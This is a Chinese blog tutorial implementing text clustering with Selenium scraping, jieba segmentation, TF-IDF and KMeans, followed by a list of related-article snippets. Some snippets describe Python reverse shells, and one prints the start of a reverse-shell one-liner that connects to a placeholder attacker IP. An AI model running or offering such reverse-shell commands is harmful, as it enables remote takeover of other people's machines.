Eastmount

[python] 基于k-means和tfidf的文本聚类代码简单实现

俗话说“外行看热闹，内行看门道“，作为一个机器学习的门外汉，刚研究python机器学习scikit-learn两周时间，虽然下面这段程序可能对于那些专研算法或机器学习的人来说非常简单，但对于一些入门的同学和我自己还是非常有帮助的。如果文章中有错误或不足之处，还请你微微一笑，原谅之；当然也非常欢迎你提出建议或指正~

基本步骤包括：
1.使用python+selenium分析dom结构爬取百度|互动百科文本摘要信息；
2.使用jieba结巴分词对文本进行中文分词，同时插入字典关于关键词；
3.scikit-learn对文本内容进行tfidf计算并构造N*M矩阵(N个文档 M个特征词)；
4.再使用K-means进行文本聚类(省略特征词过来降维过程);
5.最后对聚类的结果进行简单的文本处理，按类簇归类，也可以计算P/R/F特征值；
6.总结这篇论文及K-means的缺点及知识图谱的一些内容。

当然这只是一篇最最基础的文章，更高深的分类、聚类、LDA、SVM、随机森林等内容，自己以后慢慢学习吧！这篇作为在线笔记，路漫漫其修远兮，fighting~

一. 爬虫实现

爬虫主要通过Python+Selenium+Phantomjs实现，爬取百度百科和互动百科旅游景点信息，其中爬取百度百科代码如下。
参考前文：[Python爬虫] Selenium获取百度百科旅游景点的InfoBox消息盒

实现原理：
首先从Tourist_spots_5A_BD.txt中读取景点信息，然后通过调用无界面浏览器PhantomJS（Firefox可替代）访问百度百科链接"http://baike.baidu.com/"，通过Selenium获取输入对话框ID，输入关键词如"故宫"，再访问该百科页面。最后通过分析DOM树结构获取摘要的ID并获取其值。核心代码如下：
driver.find_elements_by_xpath("//div[@class='lemma-summary']/div")

PS：Selenium更多应用于自动化测试，推荐Python爬虫使用scrapy等开源工具。

# coding=utf-8  
""" 
Created on 2015-09-04 @author: Eastmount  
"""  
  
import time          
import re          
import os  
import sys
import codecs
import shutil
from selenium import webdriver      
from selenium.webdriver.common.keys import Keys      
import selenium.webdriver.support.ui as ui      
from selenium.webdriver.common.action_chains import ActionChains  
  
#Open PhantomJS  
driver = webdriver.PhantomJS(executable_path="G:\phantomjs-1.9.1-windows\phantomjs.exe")  
#driver = webdriver.Firefox()  
wait = ui.WebDriverWait(driver,10)

#Get the Content of 5A tourist spots  
def getInfobox(entityName, fileName):  
    try:  
        #create paths and txt files
        print u'文件名称: ', fileName
        info = codecs.open(fileName, 'w', 'utf-8')  

        #locate input  notice: 1.visit url by unicode 2.write files
        #Error: Message: Element not found in the cache -
        #       Perhaps the page has changed since it was looked up
        #解决方法: 使用Selenium和Phantomjs
        print u'实体名称: ', entityName.rstrip('\n') 
        driver.get("http://baike.baidu.com/")  
        elem_inp = driver.find_element_by_xpath("//form[@id='searchForm']/input")  
        elem_inp.send_keys(entityName)  
        elem_inp.send_keys(Keys.RETURN)  
        info.write(entityName.rstrip('\n')+'\r\n')  #codecs不支持'\n'换行
        time.sleep(2)  
  
        #load content 摘要
        elem_value = driver.find_elements_by_xpath("//div[@class='lemma-summary']/div")
        for value in elem_value:
            print value.text
            info.writelines(value.text + '\r\n')
        time.sleep(2)  
          
    except Exception,e:    #'utf8' codec can't decode byte  
        print "Error: ",e  
    finally:  
        print '\n'  
        info.close() 
  
#Main function  
def main():
    #By function get information
    path = "BaiduSpider\\"
    if os.path.isdir(path):
        shutil.rmtree(path, True)
    os.makedirs(path)
    source = open("Tourist_spots_5A_BD.txt", 'r')
    num = 1
    for entityName in source:  
        entityName = unicode(entityName, "utf-8")  
        if u'故宫' in entityName:   #else add a '?'  
            entityName = u'北京故宫'
        name = "%04d" % num
        fileName = path + str(name) + ".txt"
        getInfobox(entityName, fileName)
        num = num + 1
    print 'End Read Files!'  
    source.close()  
    driver.close()
    
if __name__ == '__main__':
    main()

运行结果如下图所示：

二. 中文分词

中文分词主要使用的是Python+Jieba分词工具，同时导入自定义词典dict_baidu.txt，里面主要是一些专业景点名词，如"黔清宫"分词"黔/清宫"，如果词典中存在专有名词"乾清宫"就会先查找词典。
参考前文：[python] 使用Jieba工具中文分词及文本聚类概念

#encoding=utf-8
import sys
import re
import codecs
import os
import shutil
import jieba
import jieba.analyse

#导入自定义词典
jieba.load_userdict("dict_baidu.txt")

#Read file and cut
def read_file_cut():
    #create path
    path = "BaiduSpider\\"
    respath = "BaiduSpider_Result\\"
    if os.path.isdir(respath):
        shutil.rmtree(respath, True)
    os.makedirs(respath)

    num = 1
    while num<=204:
        name = "%04d" % num 
        fileName = path + str(name) + ".txt"
        resName = respath + str(name) + ".txt"
        source = open(fileName, 'r')
        if os.path.exists(resName):
            os.remove(resName)
        result = codecs.open(resName, 'w', 'utf-8')
        line = source.readline()
        line = line.rstrip('\n')
        
        while line!="":
            line = unicode(line, "utf-8")
            seglist = jieba.cut(line,cut_all=False)  #精确模式
            output = ' '.join(list(seglist))         #空格拼接
            print output
            result.write(output + '\r\n')
            line = source.readline()
        else:
            print 'End file: ' + str(num)
            source.close()
            result.close()
        num = num + 1
    else:
        print 'End All'

#Run function
if __name__ == '__main__':
    read_file_cut()

按照Jieba精确模式分词且空格拼接，"0003.txt 颐和园"分词结果如下图所示：

[python] 基于k-means和tfidf的文本聚类代码简单实现_第2张图片

为方便后面的计算或对接一些sklearn或w2v等工具，下面这段代码将结果存储在同一个txt中，每行表示一个景点的分词结果。

# coding=utf-8            
import re          
import os  
import sys
import codecs
import shutil

def merge_file():
    path = "BaiduSpider_Result\\"
    resName = "BaiduSpider_Result.txt"
    if os.path.exists(resName):
        os.remove(resName)
    result = codecs.open(resName, 'w', 'utf-8')

    num = 1
    while num <= 204:
        name = "%04d" % num 
        fileName = path + str(name) + ".txt"
        source = open(fileName, 'r')
        line = source.readline()
        line = line.strip('\n')
        line = line.strip('\r')

        while line!="":
            line = unicode(line, "utf-8")
            line = line.replace('\n',' ')
            line = line.replace('\r',' ')
            result.write(line+ ' ')
            line = source.readline()
        else:
            print 'End file: ' + str(num)
            result.write('\r\n')
            source.close()
        num = num + 1
        
    else:
        print 'End All'
        result.close()    

if __name__ == '__main__':
    merge_file()

每行一个景点的分词结果，运行结果如下图所示：

[python] 基于k-means和tfidf的文本聚类代码简单实现_第3张图片

三. 计算TF-IDF

此时，需要将文档相似度问题转换为数学向量矩阵问题，可以通过VSM向量空间模型来存储每个文档的词频和权重，特征抽取完后，因为每个词语对实体的贡献度不同，所以需要对这些词语赋予不同的权重。计算词项在向量中的权重方法——TF-IDF。

相关介绍：
它表示TF（词频）和IDF（倒文档频率）的乘积：

其中TF表示某个关键词出现的频率，IDF为所有文档的数目除以包含该词语的文档数目的对数值。

|D|表示所有文档的数目，|w∈d|表示包含词语w的文档数目。
最后TF-IDF计算权重越大表示该词条对这个文本的重要性越大，它的目的是去除一些"的、了、等"出现频率较高的常用词。

参考前文：Python简单实现基于VSM的余弦相似度计算
基于VSM的命名实体识别、歧义消解和指代消解

下面是使用scikit-learn工具调用CountVectorizer()和TfidfTransformer()函数计算TF-IDF值，同时后面"四.K-means聚类"代码也包含了这部分，该部分代码先提出来介绍。

# coding=utf-8  
""" 
Created on 2015-12-30 @author: Eastmount  
"""  
  
import time          
import re          
import os  
import sys
import codecs
import shutil
from sklearn import feature_extraction  
from sklearn.feature_extraction.text import TfidfTransformer  
from sklearn.feature_extraction.text import CountVectorizer

'''
sklearn里面的TF-IDF主要用到了两个函数：CountVectorizer()和TfidfTransformer()。
    CountVectorizer是通过fit_transform函数将文本中的词语转换为词频矩阵。
    矩阵元素weight[i][j] 表示j词在第i个文本下的词频，即各个词语出现的次数。
    通过get_feature_names()可看到所有文本的关键字，通过toarray()可看到词频矩阵的结果。
    TfidfTransformer也有个fit_transform函数，它的作用是计算tf-idf值。
'''

if __name__ == "__main__":
    corpus = [] #文档预料 空格连接

    #读取预料 一行预料为一个文档
    for line in open('BaiduSpider_Result.txt', 'r').readlines():
        print line
        corpus.append(line.strip())
    #print corpus
    time.sleep(5)
    
    #将文本中的词语转换为词频矩阵 矩阵元素a[i][j] 表示j词在i类文本下的词频
    vectorizer = CountVectorizer()

    #该类会统计每个词语的tf-idf权值
    transformer = TfidfTransformer()

    #第一个fit_transform是计算tf-idf 第二个fit_transform是将文本转为词频矩阵
    tfidf = transformer.fit_transform(vectorizer.fit_transform(corpus))

    #获取词袋模型中的所有词语  
    word = vectorizer.get_feature_names()

    #将tf-idf矩阵抽取出来，元素w[i][j]表示j词在i类文本中的tf-idf权重
    weight = tfidf.toarray()

    resName = "BaiduTfidf_Result.txt"
    result = codecs.open(resName, 'w', 'utf-8')
    for j in range(len(word)):
        result.write(word[j] + ' ')
    result.write('\r\n\r\n')

    #打印每类文本的tf-idf词语权重，第一个for遍历所有文本，第二个for便利某一类文本下的词语权重  
    for i in range(len(weight)):
        print u"-------这里输出第",i,u"类文本的词语tf-idf权重------"  
        for j in range(len(word)):
            result.write(str(weight[i][j]) + ' ')
        result.write('\r\n\r\n')

    result.close()

其中输出如下所示，由于文本摘要不多，总共8368维特征，其中共400个景点（百度百科200 互动百科200）文本摘要，故构建的矩阵就是[400][8368]，其中每个景点都有对应的矩阵存储TF-IDF值。

缺点：可以尝试出去一些停用词、数字等，同时可以如果文档维数过多，可以设置固定的维度，同时进行一些降维操作或构建稀疏矩阵，大家可以自己去研究下。
推荐一些优秀的关于Sklearn工具TF-IDF的文章：
python scikit-learn计算tf-idf词语权重 - liuxuejiang158
用Python开始机器学习（5：文本特征抽取与向量化） - lsldd大神
官方scikit-learn文档 4.3. Preprocessing data

四. K-means聚类

其中K-means聚类算法代码如下所示，主要是调用sklearn.cluster实现。
强推一些机器学习大神关于Scikit-learn工具的分类聚类文章，非常优秀：
  用Python开始机器学习（10：聚类算法之K均值） -lsldd大神
应用scikit-learn做文本分类（特征提取 KNN SVM 聚类） - Rachel-Zhang大神
  Scikit Learn: 在python中机器学习(KNN SVMs K均) - yyliu大神开源中国
【机器学习实验】scikit-learn的主要模块和基本使用 - JasonDing大神
  Scikit-learn学习笔记中文简介(P30-Cluster) - 百度文库
  使用sklearn做kmeans聚类分析 - xiaolitnt
  使用sklearn + jieba中文分词构建文本分类器 - MANYU GOU大神
sklearn学习(1) 数据集（官方数据集使用） - yuanyu5237大神
  scikit-learn使用笔记与sign prediction简单小结 - xupeizhi
  http://scikit-learn.org/stable/modules/clustering.html#clustering

代码如下：

# coding=utf-8  
""" 
Created on 2016-01-06 @author: Eastmount  
"""  
  
import time          
import re          
import os  
import sys
import codecs
import shutil
import numpy as np
from sklearn import feature_extraction  
from sklearn.feature_extraction.text import TfidfTransformer  
from sklearn.feature_extraction.text import CountVectorizer  

if __name__ == "__main__":
    
    #########################################################################
    #                           第一步 计算TFIDF
    
    #文档预料 空格连接
    corpus = []
    
    #读取预料 一行预料为一个文档
    for line in open('BHSpider_Result.txt', 'r').readlines():
        print line
        corpus.append(line.strip())
    #print corpus
    #time.sleep(1)
    
    #将文本中的词语转换为词频矩阵 矩阵元素a[i][j] 表示j词在i类文本下的词频
    vectorizer = CountVectorizer()

    #该类会统计每个词语的tf-idf权值
    transformer = TfidfTransformer()

    #第一个fit_transform是计算tf-idf 第二个fit_transform是将文本转为词频矩阵
    tfidf = transformer.fit_transform(vectorizer.fit_transform(corpus))

    #获取词袋模型中的所有词语  
    word = vectorizer.get_feature_names()

    #将tf-idf矩阵抽取出来，元素w[i][j]表示j词在i类文本中的tf-idf权重
    weight = tfidf.toarray()

    #打印特征向量文本内容
    print 'Features length: ' + str(len(word))
    resName = "BHTfidf_Result.txt"
    result = codecs.open(resName, 'w', 'utf-8')
    for j in range(len(word)):
        result.write(word[j] + ' ')
    result.write('\r\n\r\n')

    #打印每类文本的tf-idf词语权重，第一个for遍历所有文本，第二个for便利某一类文本下的词语权重  
    for i in range(len(weight)):
        print u"-------这里输出第",i,u"类文本的词语tf-idf权重------"  
        for j in range(len(word)):
            #print weight[i][j],
            result.write(str(weight[i][j]) + ' ')
        result.write('\r\n\r\n')

    result.close()


    ########################################################################
    #                               第二步 聚类Kmeans

    print 'Start Kmeans:'
    from sklearn.cluster import KMeans
    clf = KMeans(n_clusters=20)
    s = clf.fit(weight)
    print s

    #20个中心点
    print(clf.cluster_centers_)
    
    #每个样本所属的簇
    print(clf.labels_)
    i = 1
    while i <= len(clf.labels_):
        print i, clf.labels_[i-1]
        i = i + 1

    #用来评估簇的个数是否合适，距离越小说明簇分的越好，选取临界点的簇个数
    print(clf.inertia_)

输出如下图所示，20个类簇中心点和408个簇，对应408个景点，每个文档对应聚在相应的类0~19。

五. 结果处理

为了更直观的显示结果，通过下面的程序对景点进行简单结果处理。

# coding=utf-8  
import os  
import sys
import codecs

'''
@2016-01-07 By Eastmount
功能:合并实体名称和聚类结果 共类簇20类
输入:BH_EntityName.txt Cluster_Result.txt
输出:ZBH_Cluster_Merge.txt ZBH_Cluster_Result.txt
'''

source1 = open("BH_EntityName.txt",'r')
source2 = open("Cluster_Result.txt",'r')
result1 = codecs.open("ZBH_Cluster_Result.txt", 'w', 'utf-8')

#########################################################################
#                        第一部分 合并实体名称和类簇

lable = []       #存储408个类标 20个类
content = []     #存储408个实体名称
name = source1.readline()
#总是多输出空格 故设置0 1使其输出一致
num = 1
while name!="":
    name = unicode(name.strip('\r\n'), "utf-8")
    if num == 1:
        res = source2.readline()
        res = res.strip('\r\n')
        
        value = res.split(' ')
        no = int(value[0]) - 1   #行号
        va = int(value[1])       #值
        lable.append(va)
        content.append(name)
        
        print name, res
        result1.write(name + ' ' + res + '\r\n')
        num = 0
    elif num == 0:
        num = 1
    name = source1.readline()
    
else:
    print 'OK'
    source1.close()
    source2.close()
    result1.close()

#测试输出 其中实体名称和类标一一对应
i = 0
while i < len(lable):
    print content[i], (i+1), lable[i]
    i = i + 1

#########################################################################
#                      第二部分 合并类簇 类1 ..... 类2 .....

#定义定长20字符串数组 对应20个类簇
output = ['']*20
result2 = codecs.open("ZBH_Cluster_Merge.txt", 'w', 'utf-8')

#统计类标对应的实体名称
i = 0
while i < len(lable):
    output[lable[i]] += content[i] + ' ' 
    i = i + 1

#输出
i = 0
while i < 20:
    print '#######'
    result2.write('#######\r\n')
    print 'Label: ' + str(i)
    result2.write('Label: ' + str(i) + '\r\n')
    print output[i]
    result2.write(output[i] + '\r\n')
    i = i + 1

result2.close()

输出结果如下图所示，其中label19可以发现百度百科和互动百科的"大昭寺、法门寺"文本内容都划分为一类，同时也会存在一些错误的类别，如Label15中的"橘子洲"。

[python] 基于k-means和tfidf的文本聚类代码简单实现_第6张图片

PS：如果你想进行准确率、回归率、F特征值比较，可以进一步去学习sklearn官方文档。通常的文本数据集的类标如"教育、体育、娱乐"，把不同内容的新闻聚在一类，而这个略有区别，它主要是应用于我实际的毕设。

六. 总结与不足

这篇文章更多的是一些基础内容的代码实现，可能对一些初学者有用，同时也是我的在线笔记吧！主要内容包括：
1.python+selenium爬取
2.jieba中文分词
3.sklearn+tfidf矩阵权重计算
4.kmeans简单实现及结果对比

Kmeans聚类是一种自下而上的聚类方法，它的优点是简单、速度快；缺点是聚类结果与初始中心的选择有关系，且必须提供聚类的数目。
Kmeans的第二个缺点是致命的，因为在有些时候，我们不知道样本集将要聚成多少个类别，这种时候kmeans是不适合的，推荐使用hierarchical 或meanshift来聚类。第一个缺点可以通过多次聚类取最佳结果来解决。

推荐一些关于Kmeans及实验评估的文章：
  浅谈Kmeans聚类 - easymind223
  基于K－Means的文本聚类（强推基础介绍） - freesum
  基于向量空间模型的文本聚类算法 - helld123
  KMeans文档聚类python实现（代码详解） - skineffect
  Kmeans文本聚类系列之全部C++代码 - finallyliuyu
  文本聚类—kmeans - zengkui111

不论如何，最后还是希望文章对你有所帮助！深夜写文不易，且看且珍惜吧~
(By:Eastmount 2016-01-08 深夜3点   http://blog.csdn.net//eastmount/ )

paddlepaddle测试安装_python3.7中安装paddleocr及paddlepaddle包的多种方法瓦啦
升级pippip版本必须升级到20.0.4版本才能应用；方法一、在pycharm中对pip进行升级；方法二、通过命令进行升级python3.7-mpipinstall--upgradepip下载paddleOCR下载链接：https://github.com/PaddlePaddle/PaddleOCR打开paddleOCR文件夹中requirements.txt文件，更改文件中opencv-py
python web django 小项目简书_Django3.0起步，第一个小项目 weixin_39712455 python web django 小项目简书
#Django_start第一个django起步小项目，新建django项目，配置mysql，sql语句操作，MVT基本操作。###1.起步```pip3--default-timeout=1000000installdjango```cd到项目目录，创建项目```django-adminstartproject项目名称```如果找不到django路径，尝试```python3/Users/zha
爬虫基础-urllib库的使用 a little peanut Python3网络爬虫 python 爬虫开发语言
注：本文章为学习过程中对知识点的记录，供自己复习使用，也给大家做个参考，如有错误，麻烦指出，大家共同探讨，互相进步。借鉴出处：该文章的路线和主要内容：崔庆才（第2版）python3网络爬虫开发实战bytes类型：https://blog.csdn.net/apple_50618492/article/details/114677967python中文官网：https://docs.python.o
Python3爬虫笔记 -- urllib Alst0n Python Python3 urllib urllib.request
urllib库是Python内置的HTTP请求库，不需要额外安装。它包含如下4个模块：request：HTTP请求模块error：异常处理模块parse：提供URL处理方法，包括拆分、解析、合并等robotparser：识别网站等robot.txt文件1、urllib.request发送请求连接URL，获取返回页面的源代码；默认请求方式为GETimporturllib.requestrespons
Python网络爬虫---urllib库介绍 db_hsk_2099 python 爬虫开发语言
1·urllib库简介·用途：urllib库是python的标准库之一，是python内置的HTTP请求库，用于发送HTTP/FTP请求，它可以看作处理URL的组件集合。·特点：简单易用，支持HTTP、HTTPS、FTP等协议。2.urllib库包含4大模块：目录：（1）urllib.request（2）urllib.parse（3）urllib.error（4）urllib.robotparse
python反弹shell 46497976464 linux 网络运维服务器
你是想问Python如何实现反弹shell吗？反弹shell是一种通过远程连接获取受害者计算机的shell权限的攻击技术。使用Python反弹shell的方法如下：首先，在本地计算机上运行一个监听程序，等待连接。然后，在受害者计算机上运行一个Python脚本，该脚本将连接到本地计算机的监听程序。当连接建立后，就可以通过本地计算机上的shell命令控制受害者计算机。具体的代码实现可以参考如下：本地计
[Python] -基础篇6-Python中的字符串处理技巧合集踏雪无痕老爷子 Python python 开发语言
Python中的字符串类型是非常常用的基础类型。不管是处理文本、数据分析，还是系统管理等场景，都不能离开字符串的操作。本文将分类整理Python字符串的常用技巧和方法，帮助你接地气地接触字符串处理的本质。1.基础操作1.1字符串切片s="Hello,Python!"print(s[0:5])#Helloprint(s[-7:])#Python!1.2字符串连接和处理name="Alice"gree
[Python] -基础篇5-玩转Python内置数据结构：列表、元组、字典与集合踏雪无痕老爷子 Python python 开发语言
Python是一门以简洁优雅著称的编程语言，其中内置的数据结构为日常编程提供了强大支持。本文将系统介绍Python中四大核心数据结构：列表（list）、元组（tuple）、字典（dict）与集合（set），并配以实用示例，帮助读者全面掌握其用法及适用场景。一、列表（List）：可变序列的代表列表是最常用的Python数据结构之一，支持动态增删改查。1.1基本操作fruits=['apple','b
如何利用股票API获取实时行情数据？有哪些好用的股票API推荐？财云量化 python炒股自动化量化交易程序化交易股票api 实时行情数据获取方法 api推荐股票量化接口股票API接口
炒股自动化：申请官方API接口，散户也可以python炒股自动化（0），申请券商API接口python炒股自动化（1），量化交易接口区别Python炒股自动化（2）：获取股票实时数据和历史数据Python炒股自动化（3）：分析取回的实时数据和历史数据Python炒股自动化（4）：通过接口向交易所发送订单Python炒股自动化（5）：通过接口查询订单，查询账户资产股票量化，Python炒股，CSDN
使用 Python 实现反弹 shell suanfa_student python chrome 开发语言
使用Python实现反弹shell如果目标系统有Python环境，可以使用以下Python命令反弹shell：python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的IP地址",端口号));os.dup2(s.fileno(),0);os.dup2(s.
详细介绍python中的模块、包、库之间的区别和联系 ‎Melody. python 开发语言
在Python中，模块（Module）、包（Package）和库（Library）是三个重要的概念，它们用于组织代码和实现代码复用。下面详细解释这三个概念：1.模块（Module）定义：一个模块就是一个以.py为后缀的Python文件。这个文件可以包含函数、类、变量以及可执行的代码。作用：模块用于将相关的代码组织在一个文件中，便于管理和重用。使用：通过import语句导入模块，然后使用模块名加点操
Python 特殊方法深度解析：从对象创建到元类编程的全攻略佑瞻 python工程化 python 开发语言
在Python开发中，我们经常会遇到需要自定义类行为的场景。无论是重载运算符、定制属性访问，还是优化内存使用，特殊方法都扮演着关键角色。这些被双下划线包裹的方法（如__init__、__getitem__）如同类的"隐藏接口"，掌握它们能让我们更灵活地操控类的行为。今天，我们就来深入探讨这些特殊方法的奥秘，揭开Python面向对象编程的底层逻辑。一、特殊方法的核心概念与基本定制特殊方法的本质特殊方
在合法靶场中用 Python 打造可升级的反弹 Shell Hello.Reader linux 渗透测试 python 开发语言
1反弹Shell概念与工作原理正向Shell：攻方主动连接受害主机并获得交互式命令行。大多受防火墙阻拦。反向/反弹Shell：受害主机（被控端）主动拨出，连接到攻方监听的端口，绕过内网出口防火墙。通信流程攻方监听LHOST:LPORT。受害主机执行脚本，向该地址建TCP/TLS连接。将标准输入/输出/错误重定向到Socket，实现交互。2环境准备角色系统工具攻方KaliLinux/ParrotOS
python | vscode | cursor | 使用uv快速创建虚拟环境（实现一个项目一个虚拟环境，方便环境管理）让我安静会配置与安装 python vscode uv
从笨重的pycharm转到vscode/cursor。vscode是编辑器，虽然可以安装各种extension，还是需要安装python解释器。安装python，实现基本代码运行：去python官网下载python的windows安装包（python解释器）安装时记得选择customized，安装非C盘中（比如D盘）将python添加到PATH中：把刚刚安装python的路径添加到系统环境变量中（
ffmpeg下载地址珊珊而川 ffmpeg
你已经通过pipinstallffmpeg安装了一个名为ffmpeg的Python包，但这并不等于你真正安装了系统级别的FFmpeg可执行程序，而roop的代码是通过调用系统的ffmpeg命令行工具来处理视频的。问题分析你遇到的报错：[ROOP.CORE]ffmpegisnotinstalled.说明roop在运行时检查系统中是否能调用ffmpeg，而不是是否安装了Python包ffmpeg。✅解
Python实现语音识别功能，只需3个步骤！
调用科大讯飞语音听写，使用Python实现语音识别，将实时语音转换为文字。首先在官网下载了关于语音听写的SDK，然后在文件夹内新建了两个.py文件，分别是get_audio.py和iat_demo.py，并且新建了一个存放录音的文件夹audios，文件夹内存放录音文件input.wav，我的整个文件目录如下：asr_SDK(文件名)├─Readme.html├─audios│└─input.wav
从零开始：Python实现语音识别的完整教程 AIGC应用创新大全 AI大模型与大数据技术 AI人工智能与大数据应用开发 MCP&Agent 云算力网络 python 语音识别 xcode ai
从零开始：Python实现语音识别的完整教程关键词：Python、语音识别、完整教程、语音输入、文字输出摘要：本文将带领大家从零开始，用Python实现语音识别功能。我们会详细介绍语音识别的核心概念、相关算法原理，通过具体的代码示例，一步步教大家搭建开发环境、实现语音识别代码，并对代码进行解读。同时，还会探讨语音识别的实际应用场景、推荐相关工具和资源，最后分析未来发展趋势与挑战。背景介绍目的和范围
从零开始：Python实现语音识别的完整教程_副本 AIGC应用创新大全 AI大模型与大数据技术 AI人工智能与大数据应用开发 MCP&Agent 云算力网络 python 语音识别开发语言 ai
从零开始：Python实现语音识别的完整教程关键词：Python、语音识别、语音转文本、音频处理、机器学习、深度学习、自然语言处理摘要：本文将带你从零开始学习如何使用Python实现语音识别功能。我们将从基础概念讲起，逐步深入到实际代码实现，涵盖音频处理、特征提取、模型训练等关键环节，最终构建一个完整的语音识别系统。无论你是初学者还是有一定经验的开发者，都能从本教程中获得实用的知识和技能。背景介绍
从零开始：用Python构建AI语音识别应用的完整指南 AI大模型应用之禅人工智能 python 语音识别 ai
从零开始：用Python构建AI语音识别应用的完整指南关键词：Python语音识别、AI语音处理、语音转文本、SpeechRecognition库、端到端模型摘要：本文从0到1带您掌握用Python构建AI语音识别应用的全流程。我们将用“给小学生讲故事”的方式，拆解语音识别的核心概念（如音频采集、特征提取、模型解码），结合代码实战（从调用API到自定义模型），并覆盖环境搭建、常见问题和未来趋势。无
爬虫实战之图片及人物信息爬取 nightunderblackcat Python进阶爬虫 python
爬虫对于许多Python初学者来说都是一个好玩有趣的技能,但大多数人都是从网上得来的经验,会认为学习爬虫是件很难的事,像处理反爬机制以及反反爬,总是让人望而却步,今天我们来进行爬虫实操,需要注意爬虫本身并不违法,但恶意爬取文件将会涉及相关法律,为避免不必要的纠纷,本文采取一个不存在的网站进行演示,本文适合Python初学者以及爬虫初学者学习,博主是大一.所以讲的话和相关技能并不特别专业,望大家谅解
Python 可迭代的对象、迭代器和生成器(标准库中的生成器函数) 钢铁男儿流程Python python java 前端
标准库中的生成器函数标准库提供了很多生成器，有用于逐行迭代纯文本文件的对象，还有出色的os.walk函数（https://docs.python.org/3/library/os.html#os.walk）。这个函数在遍历目录树的过程中产出文件名，因此递归搜索文件系统像for循环那样简单。os.walk生成器函数的作用令人赞叹，不过本节专注于通用的函数：参数为任意的可迭代对象，返回值是生成器，用于
Android Gantt View 安卓实现项目甘特图 netkiller-BG7NYT Android 手札 android 甘特图
需要做一个项目管理工具，其中使用到了甘特图。发现全网甘特图解决方案比较少，于是自动动手丰衣足食。前面我用Python和Node.js前端都做过，这次仅仅是移植到Android上面。其实甘特图非常简单，开发也不难，如果我专职去做，能做出一个非常棒产品。我写这个只是消遣，玩玩，闲的蛋痛，所以不怎么上心，就搞成下面这德行吧。仅仅供大家学习，参考。那天心情好了，完善一下。屏幕布局文件
物流数据行业分析（包含完整代码和流程）------python数据分析师项目Anaconda 欲梦yhd 数据分析项目大数据 conda python
一、引言数据分析流程为明确目的、获取数据、数据探索和预处理、分析数据、得出结论、验证结论、结果展现。物流业务中对数据进行深入挖掘和分析的过程，旨在提高运输效率、降低运输成本、提高客户满意度，以及提高公司的竞争力。本案例物流数据分析目的：a、配送服务是否存在问题b、是否存在尚有潜力的销售区域c、商品是否存在质量问题二、详细流程1、数据预处理（数据清洗）（1）数据导入使用panda库读取数据，编码方式
HoloViz Panel项目：跨环境无缝开发指南郁蝶文Yvette
HoloVizPanel项目：跨环境无缝开发指南panelholoviz/panel:Panel是一个开源的数据可视化库，专为Python生态设计，基于HoloViews构建，能够轻松将各种数据科学和数据分析结果转化为交互式仪表板应用。用户可以创建复杂的可视化界面，并与Bokeh、Plotly等其他可视化工具结合使用。项目地址:https://gitcode.com/gh_mirrors/pan/
2025年 UI 自动化框架使用排行 Thomas Kant 自动化测试 ui 自动化运维
亲爱的技术爱好者们，热烈欢迎来到Kant2048的博客！我是ThomasKant，很开心能在CSDN上与你们相遇～本博客的精华专栏：【自动化测试】【测试经验】【人工智能】【Python】</
Python 数据分析与可视化 Day 10 - 数据合并与连接
✅今日目标理解Pandas中数据合并的4种常用方式：concat、merge、join、combine掌握内连接、外连接、左连接、右连接等操作方式掌握按列对齐、按索引对齐的区别为后续数据整合、特征拼接等建模任务做准备一、concat合并（按行/列拼接）df1=pd.DataFrame({"姓名":["张三","李四"],"成绩":[85,90]})df2=pd.DataFrame({"姓名":["
Python数据可视化-----制作全球地震散点图从未止步.. python python json 数据结构
为了制作全球地震散点图，我在网上下载了一个数据集，其中记录了一个月内全球发生的所有地震，但这些数据是以JSON格式存储的，因此需要用json模块来进行处理。查看JSON数据：首先我们先打开下载好的数据集浏览一下：你会发现其中的数据密密麻麻，根本不是人读的，因此，接下来我们将对数据进行处理，让它变得简单易读。importjson#导入json模块，以便于加载文件中的数据filename='eq_da
算法竞赛备考冲刺必刷题（C++） | 洛谷 P1001 A+B Problem 热爱编程的通信人 c++算法
本文分享的必刷题目是从蓝桥云课、洛谷、AcWing等知名刷题平台精心挑选而来，并结合各平台提供的算法标签和难度等级进行了系统分类。题目涵盖了从基础到进阶的多种算法和数据结构，旨在为不同阶段的编程学习者提供一条清晰、平稳的学习提升路径。欢迎大家订阅我的专栏：算法题解：C++与Python实现！附上汇总贴：算法竞赛备考冲刺
Python实现对WPS协作群进行群消息自动推送写python的鑫哥 Python课堂 wps 协作群消息自动推送 Python
前言本文是该专栏的第59篇，后面会持续分享python的各种干货知识，值得关注。相信有些同学在工作或者项目中，都会使用到“WPS协作”作为办公聊天软件。如果说，有些项目的监控预警正好需要你同步到WPS协作群，这个时候需要怎么去做呢？而本文，笔者将基于WPS协作，通过Python来实现对项目中的监控预警，进行群消息的自动推送。废话不多说，具体的细节部分以及完整实现思路，跟着笔者直接往下看正文详细内容
Python 数据分析与可视化 Day 11 - 特征工程基础蓝婷儿 python python 数据分析人工智能
✅今日目标理解特征工程在数据分析和机器学习中的意义掌握常见特征类型的处理方式：数值型、类别型、时间型学习特征提取、转换、标准化、独热编码（One-HotEncoding）等核心操作为后续建模任务做好特征准备工作一、什么是特征工程？特征工程是将原始数据转换为模型可学习的“特征向量”的过程，是机器学习效果好坏的核心因素之一。常见任务包括：缺失值处理（已学）异常值处理（已学）数值归一化、标准化类别变量编
关于旗正规则引擎规则中的上传和下载问题何必如此文件下载压缩 jsp 文件上传
文件的上传下载都是数据流的输入输出，大致流程都是一样的。一、文件打包下载 1.文件写入压缩包 string mainPath="D:\upload\"; 下载路径 string tmpfileName=jar.zip; &n
【Spark九十九】Spark Streaming的batch interval时间内的数据流转源码分析 bit1129 Stream
以如下代码为例（SocketInputDStream）： Spark Streaming从Socket读取数据的代码是在SocketReceiver的receive方法中，撇开异常情况不谈(Receiver有重连机制，restart方法，默认情况下在Receiver挂了之后，间隔两秒钟重新建立Socket连接)，读取到的数据通过调用store(textRead)方法进行存储。数据
spark master web ui 端口8080被占用解决方法 daizj 8080 端口占用 spark master web ui
spark master web ui 默认端口为8080，当系统有其它程序也在使用该接口时，启动master时也不会报错，spark自己会改用其它端口，自动端口号加1，但为了可以控制到指定的端口，我们可以自行设置，修改方法： 1、cd SPARK_HOME/sbin 2、vi start-master.sh 3、定位到下面部分
oracle_执行计划_谓词信息和数据获取周凡杨 oracle 执行计划
